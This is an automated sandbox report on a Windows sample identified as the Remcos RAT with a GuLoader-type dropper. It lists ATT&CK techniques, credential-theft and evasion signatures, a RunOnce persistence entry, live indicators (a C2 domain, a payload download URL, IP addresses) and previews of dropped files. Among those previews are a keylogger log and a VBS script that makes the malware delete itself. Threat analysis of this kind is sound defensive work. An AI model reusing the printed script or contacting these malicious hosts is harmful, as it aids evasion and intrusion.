              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              228
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              File Deletion
              LSA Secrets331
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Masquerading
              Cached Domain Credentials2
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture113
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Virtualization/Sandbox Evasion
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590918 Sample: LrBF2Z930N Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 34 linktreewealth.zapto.org 2->34 36 teldrum.ro 2->36 38 2 other IPs or domains 2->38 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 11 other signatures 2->60 8 LrBF2Z930N.exe 27 2->8         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 8->26 dropped 62 Detected unpacking (changes PE section rights) 8->62 64 Tries to steal Mail credentials (via file registry) 8->64 66 Tries to detect virtualization through RDTSC time measurements 8->66 68 Switches to a custom stack to bypass stack traces 8->68 12 LrBF2Z930N.exe 8 20 8->12         started        signatures6 process7 dnsIp8 40 linktreewealth.zapto.org 43.226.229.209, 3980, 61632, 61633 SOFTLAYERUS Hong Kong 12->40 42 teldrum.ro 109.99.162.14, 443, 61631 RTDBucharestRomaniaRO Romania 12->42 44 geoplugin.net 178.237.33.50, 61634, 80 ATOM86-ASATOM86NL Netherlands 12->44 28 C:\Users\user\AppData\...\Rockerfest.bat, PE32 12->28 dropped 30 C:\Users\user\AppData\Local\Temp\lwze.vbs, data 12->30 dropped 32 C:\ProgramData\remcos\logs.dat, data 12->32 dropped 70 Detected Remcos RAT 12->70 72 Maps a DLL or memory area into another process 12->72 74 Installs a global keyboard hook 12->74 17 LrBF2Z930N.exe 1 12->17         started        20 LrBF2Z930N.exe 1 12->20         started        22 LrBF2Z930N.exe 2 12->22         started        24 wscript.exe 12->24         started        file9 signatures10 process11 signatures12 46 Tries to steal Instant Messenger accounts or passwords 17->46 48 Tries to harvest and steal browser information (history, passwords, etc) 17->48 50 Tries to steal Mail credentials (via file / registry access) 20->50 52 Deletes itself after installation 24->52

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              LrBF2Z930N.exe35%VirustotalBrowse
              LrBF2Z930N.exe26%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat26%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsk82C6.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
              linktreewealth.zapto.org0%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
              linktreewealthy.zapto.org0%Avira URL Cloudsafe
              https://teldrum.ro/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              linktreewealth.zapto.org
              43.226.229.209
              truetrue
                unknown
                geoplugin.net
                178.237.33.50
                truefalse
                  high
                  teldrum.ro
                  109.99.162.14
                  truefalse
                    unknown
                    198.187.3.20.in-addr.arpa
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gpfalse
                        high
                        https://teldrum.ro/NJrdZqNcCtz102.binfalse
                        • Avira URL Cloud: safe
                        unknown
                        linktreewealth.zapto.orgtrue
                        • Avira URL Cloud: safe
                        unknown
                        linktreewealthy.zapto.orgtrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.google.comLrBF2Z930N.exefalse
                          high
                          http://www.imvu.comrLrBF2Z930N.exe, 00000004.00000002.4484694485.0000000037830000.00000040.10000000.00040000.00000000.sdmpfalse
                            high
                            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdLrBF2Z930N.exe, 00000004.00000001.3385362430.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                              high
                              http://geoplugin.net/LrBF2Z930N.exe, 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3647469796.00000000069CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.imvu.comLrBF2Z930N.exefalse
                                  high
                                  https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.binLrBF2Z930N.exe, 00000004.00000002.4459637902.0000000006B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdLrBF2Z930N.exe, 00000004.00000001.3385362430.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                    high
                                    https://www.google.com/accounts/serviceloginLrBF2Z930N.exefalse
                                      high
                                      https://login.yahoo.com/config/loginLrBF2Z930N.exefalse
                                        high
                                        http://nsis.sf.net/NSIS_ErrorErrorLrBF2Z930N.exe, 00000000.00000000.2097681072.000000000040A000.00000008.00000001.01000000.00000003.sdmp, LrBF2Z930N.exe, 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmp, LrBF2Z930N.exe, 00000004.00000000.3383237731.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                          high
                                          http://www.nirsoft.net/LrBF2Z930N.exefalse
                                            high
                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comLrBF2Z930N.exe, 00000004.00000002.4484694485.0000000037830000.00000040.10000000.00040000.00000000.sdmpfalse
                                              high
                                              https://teldrum.ro/LrBF2Z930N.exe, 00000004.00000002.4458828741.0000000006968000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.ebuddy.comLrBF2Z930N.exefalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                43.226.229.209
                                                linktreewealth.zapto.orgHong Kong
                                                36351SOFTLAYERUStrue
                                                109.99.162.14
                                                teldrum.roRomania
                                                9050RTDBucharestRomaniaROfalse
                                                178.237.33.50
                                                geoplugin.netNetherlands
                                                8455ATOM86-ASATOM86NLfalse
                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1590918
                                                Start date and time:2025-01-14 15:28:45 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 10m 19s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:9
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:LrBF2Z930N.exe
                                                (renamed file extension from none to exe, renamed because original name is a hash value)
                                                Original Sample Name:4e8d586a950492c30147b7d56bcfad49cd577966
                                                Detection:MAL
                                                Classification:mal100.phis.troj.spyw.evad.winEXE@11/14@4/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 177
                                                • Number of non-executed functions: 317
                                                Cookbook Comments:
                                                • Override analysis time to 240s for sample files taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.12.23.50, 20.3.187.198
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                TimeTypeDescription
                                                09:32:44API Interceptor725534x Sleep call for process: LrBF2Z930N.exe modified
                                                15:32:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat
                                                15:32:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                43.226.229.2092T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  109.99.162.142T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                      z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          DHL_119040 receipt document,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            SecuriteInfo.com.W32.MSIL_Kryptik.HRZ.genEldorado.12789.exeGet hashmaliciousAgentTeslaBrowse
                                                              SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeGet hashmaliciousAgentTeslaBrowse
                                                                178.237.33.502T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • geoplugin.net/json.gp
                                                                preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                • geoplugin.net/json.gp
                                                                verynicegirlwalkingarounftheworldmuuuah.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                plugmancrypted.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                documents.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                teldrum.ro2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 109.99.162.14
                                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                • 109.99.162.14
                                                                z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 109.99.162.14
                                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 109.99.162.14
                                                                linktreewealth.zapto.org2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 43.226.229.209
                                                                geoplugin.net2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                • 178.237.33.50
                                                                verynicegirlwalkingarounftheworldmuuuah.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 178.237.33.50
                                                                plugmancrypted.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                documents.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                RTDBucharestRomaniaROarm7.elfGet hashmaliciousMiraiBrowse
                                                                • 109.102.20.98
                                                                2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 109.99.162.14
                                                                4.elfGet hashmaliciousUnknownBrowse
                                                                • 193.231.241.68
                                                                Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                • 92.83.30.89
                                                                3.elfGet hashmaliciousUnknownBrowse
                                                                • 109.99.173.54
                                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                • 109.99.162.14
                                                                z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 109.99.162.14
                                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 109.99.162.14
                                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 92.87.162.218
                                                                z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                • 89.122.79.113
                                                                ATOM86-ASATOM86NL2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                • 178.237.33.50
                                                                verynicegirlwalkingarounftheworldmuuuah.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 178.237.33.50
                                                                plugmancrypted.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                documents.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                c.htaGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                SOFTLAYERUSarm5.elfGet hashmaliciousUnknownBrowse
                                                                • 165.192.205.133
                                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 169.52.8.120
                                                                meth5.elfGet hashmaliciousMiraiBrowse
                                                                • 161.202.248.213
                                                                meth15.elfGet hashmaliciousMiraiBrowse
                                                                • 216.40.224.50
                                                                2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 43.226.229.209
                                                                elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 103.56.222.75
                                                                https://www.facebook.com/share/1A9gt2P1afGet hashmaliciousUnknownBrowse
                                                                • 52.116.53.155
                                                                res.sh4.elfGet hashmaliciousUnknownBrowse
                                                                • 184.172.25.27
                                                                res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                • 158.177.96.218
                                                                4.elfGet hashmaliciousUnknownBrowse
                                                                • 184.172.50.18
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                37f463bf4616ecd445d4a1937da06e192T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 109.99.162.14
                                                                183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                                                • 109.99.162.14
                                                                Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                                • 109.99.162.14
                                                                sysadmin.exeGet hashmaliciousVidarBrowse
                                                                • 109.99.162.14
                                                                JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                • 109.99.162.14
                                                                149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                                • 109.99.162.14
                                                                149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
                                                                • 109.99.162.14
                                                                YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                                                                • 109.99.162.14
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Local\Temp\nsk82C6.tmp\System.dll2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                                    2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                                      2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                                        ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          https://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exeGet hashmaliciousUnknownBrowse
                                                                            RFQ_BDS636011.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):296
                                                                                    Entropy (8bit):3.419730426607857
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Mls4NUlP5YcIeeDAlOWAAe5q1gWA7DxbN2fBMMm0v:t4Glnec0WFe5BWItN25MMl
                                                                                    MD5:2C06EFAFA2291D8E9A89DD1B9F799E8B
                                                                                    SHA1:9438FF19F69B026520CC960CEE6DBB6FBB728BA9
                                                                                    SHA-256:D69C37335708204BC28C08E13CF1447DDD075844BC5466E7811877A3932D5602
                                                                                    SHA-512:F7867D5C0E02BF78BACB9A0512EC6277F1EF9DE9FC30E17013E95D1BECD6D0EE2BA9F84CA52F508E7FE5CF6CDB47F1D7FC7040C4A76965F6F9CD39460EF7B979
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Preview:....[.2.0.2.5./.0.1./.1.4. .0.9.:.3.2.:.1.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):963
                                                                                    Entropy (8bit):5.018722888793802
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7XcV7Wro
                                                                                    MD5:267F9EC6CC4E12E1C5709DF015F4696F
                                                                                    SHA1:D9A4A1DB44DB5776CA5821E37206665999BFC558
                                                                                    SHA-256:8DB7063EB28EBF372CB46CDE7B85DCC719076BDD3A2DCA3CCF7E3881355AED3A
                                                                                    SHA-512:0907B58486F974BCD909ECA874F0A93E33DB534DEAA32EA3F332752C3D8CF284901187D642B22FE6718A8D98087D39BEE91317989AA62B3D1B0EA20D0CC8630A
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7126",. "geoplugin_longitude":"-74.0066",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):25
                                                                                    Entropy (8bit):4.0536606896881855
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:8+dB4WYiTNvn:8AbYiTNvn
                                                                                    MD5:08CA75DA54EB4810D18796C97F510A55
                                                                                    SHA1:3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
                                                                                    SHA-256:E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
                                                                                    SHA-512:46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:[Bus Clock]..Gats=Galse..
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa78086e5, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                    Category:dropped
                                                                                    Size (bytes):17301504
                                                                                    Entropy (8bit):0.8035057105868495
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:CdfjZb5aXEY2waXEY24URlWe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ++:QVQ4e81ySaKKjirONseWs
                                                                                    MD5:BB728BFAF44C3F68CBF27B712B6E762C
                                                                                    SHA1:B7D541F6085C09B35F833782585A6CB1C6C0F7F0
                                                                                    SHA-256:343EE207FF7E05C7C8F745FBE4BB8BB66AB43D1CEE7A46A2E2254BD788B94C5C
                                                                                    SHA-512:F62C49194470D1533F75AE4548C59D0E1683FA91A5D21CE8538E74A49A34AABB74507BF7CA0713A56320AED38CD2E8C0A371B1D38C7463DFC4D761E124FDB884
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:....... .......;!......E{ow("...{........................@.....0....{O......}..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{].................................A){......}....................a......}...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Category:dropped
                                                                                    Size (bytes):550217
                                                                                    Entropy (8bit):7.712228071105721
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
                                                                                    MD5:25EEC63EDF7C0EB8628A89712B5CB363
                                                                                    SHA1:4E8D586A950492C30147B7D56BCFAD49CD577966
                                                                                    SHA-256:E075807417590255DE4D395FA3DFBC336E88C96BBAB8AFCA1D5E5D5ABBAC0237
                                                                                    SHA-512:086FEB119E2A02F2FD7AFC45C422F9B472F049EB2E79F83769F25254D88A84086275D2CFF1E891D360EA57978292CD0CAF958E4000CD659AC532165E1F881DFB
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 26%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..........................0............@.............................................X............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):472
                                                                                    Entropy (8bit):3.5294821709177473
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:xQ4lA2++ugypjBQMPURoFgQ3DxFg9Hz/0aimi:7a2+SDhQTU9Aait
                                                                                    MD5:924A0F06DBF7BB208285CF7B75A793CE
                                                                                    SHA1:B8F4C230F4DD6E8AF65BDC73D5183D2327F8DEE5
                                                                                    SHA-256:57793763924E8B7FC8EDFBD405CEA9FFAEAF05BD282EDA83C47D7B474B7A14E7
                                                                                    SHA-512:3FA9F4C35238E7419160D0779A9781C0343A29E999E7C622277011F9863A98590D322775191C6441C5B5918E006A9186BA2C8D01912BE001745115A93FEACE63
                                                                                    Malicious:true
                                                                                    Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\.L.r.B.F.2.Z.9.3.0.N...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\.L.r.B.F.2.Z.9.3.0.N...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1091527
                                                                                    Entropy (8bit):3.7883797592579986
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:qvZYo2Z5DAmaghhFm2YqtP4lIxgBVLpadBoS9CR:8YdJagOWP4EeVLeOF
                                                                                    MD5:714AB9E19CCDB0A431DB45B3EFD1D462
                                                                                    SHA1:C61D1E403FDF00B6FC47481D1C56BE7368A496E7
                                                                                    SHA-256:2B9B7C3E4EA530F8AE338734ED61B365F0A124687EE88BEAE57E07259B0DCE66
                                                                                    SHA-512:A6E108B4787A8EA44BC6187960FBEC6B5C7954ED6695060C4BE8A88B579928CA31E4E30501374F9F896DEF92438EE1A04C2DBDA6CD4255E24587DE4741595F0B
                                                                                    Malicious:false
